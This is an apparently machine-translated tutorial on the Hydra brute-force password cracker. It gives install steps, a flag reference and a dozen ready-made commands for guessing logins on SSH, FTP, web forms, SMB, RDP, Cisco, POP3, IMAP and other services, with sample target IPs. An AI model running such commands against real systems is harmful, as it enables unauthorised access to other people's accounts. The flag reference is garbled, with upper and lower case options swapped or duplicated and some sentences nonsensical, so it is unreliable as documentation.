Detailed explanation of Hydra, the latest online cracking tool for brute-force password cracking in CentOS

PS: This brute-force password cracking tool is quite powerful and supports online password cracking for almost all protocols. The key to cracking the password is whether the dictionary is powerful enough. Social engineering penetration can sometimes get twice the result with half the effort. This article only explores the test from the security point of view, and uses the content of this article to do the damage, it has nothing to do with me.

I. Introduction

Hydra is an open-source brute-force password cracking tool for thc, a famous hacker organization. It can crack multiple types of passwords online. Official Website: http://www.thc.org/thc-hydra, support AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, OracleListener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, ipvs, RDP, rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Ii. Installation

If Debian and Ubuntu are released, hydra is included in the source and can be directly installed online with apt-get:
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra

Download the source code package for Redhat/Fedora release, compile and install it, and first install the relevant dependency package:
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel

Hydra: http://www.thc.org/releases/hydra-7.3.tar.gz

# tar zxvf hydra-7.0-src.tar.gz
# cd hydra-7.0-src
# ./configure
# make
# make install

Hydra supports GUI, but it is a habit of using commands.

Iii. parameter description

Hydra [[[-l LOGIN |-l file] [-p PASS |-p file] | [-c file] [-e ns]
[-O FILE] [-t TASKS] [-m file [-t tasks] [-w TIME] [-f] [-s PORT] [-S] [- vV] server service [OPT]
-R continues to crack the previous progress.
-S uses SSL links.
-S PORT can be used to specify non-default ports.
-L LOGIN specifies the target user to crack.
-L file specifies the username dictionary.
-P PASS is in lowercase and password cracking is specified. password dictionary is generally used.
-P file in uppercase, specifying the password dictionary.
-E ns: Optional; n: empty password; s: Use the specified user and password.
-C file uses the colon-separated format, for example, "Logon Name: Password" to replace the-L/-P parameter.
-M file: Specifies one row for the target list FILE.
-O FILE specifies the output FILE.
-F: After the-M parameter is used, stop cracking when the first pair of Logon names or passwords is found.
-T number of threads running simultaneously by TASKS. The default value is 16.
-W TIME sets the maximum timeout TIME, in seconds. The default value is 30 s.
-V/-V shows the detailed process.
Target ip address of the server
Service: Specifies the service name. supported services and protocols: telnet ftp pop3 [-ntlm] imap [-ntlm] smb smbnt http-{head | get} http-{get | post}-form http-proxy cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener ipvs nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth [-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp and so on.
OPT Option


Iv. usage examples

Simple Demonstration:

If the attack succeeds, the result is displayed. The red line is the cracked password, which can be output to the file through the-o parameter. If the dictionary is powerful enough and combined with social engineering, it will take a long time for the password to come out.

1. ssh cracking:

Hydra-l username-p password dictionary-t thread-vV-e ns ip ssh
Hydra-l username-p password dictionary-t thread-o save. log-vV ip ssh

2. Crack ftp:

Hydra ip ftp-l user name-P password dictionary-t thread (16 by default)-vV
Hydra ip ftp-l user name-P password dictionary-e ns-vV

3. Submit in get mode to crack web Logon:

Hydra-l username-p password dictionary-t thread-vV-e ns ip http-get/admin/
Hydra-l username-p password dictionary-t thread-vV-e ns-f ip http-get/admin/index. php

4. Submit in post mode to crack web Logon:

Hydra-l username-P password dictionary-s 80 ip http-post-form "/admin/login. php: username = ^ USER ^ & password = ^ PASS ^ & submit = login: sorry password"


hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

(Parameter description: The ttling process is. the user name is admin, and the pass.txt is saved as out.txt. The-f password is stopped when the password is cracked. The target ip address 10.36.16.18 and http-post-form indicate that the password is cracked by using the http post method, <title> the content indicates the returned information prompt of the error guess .)

5. Crack https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6. Crack teamspeak:

Hydra-l username-P password dictionary-s port number-vV ip teamspeak

7. Crack cisco:

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8. Crack smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9. Crack pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10. Crack rdp:

hydra ip rdp -l administrator -P pass.txt -V

11. Crack http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12. Crack imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN


Permanent Link: http://www.ha97.com/5186.html